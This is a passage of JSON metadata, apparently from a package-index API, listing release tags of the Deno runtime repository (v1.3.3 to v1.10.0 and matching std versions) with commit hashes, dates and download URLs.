Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/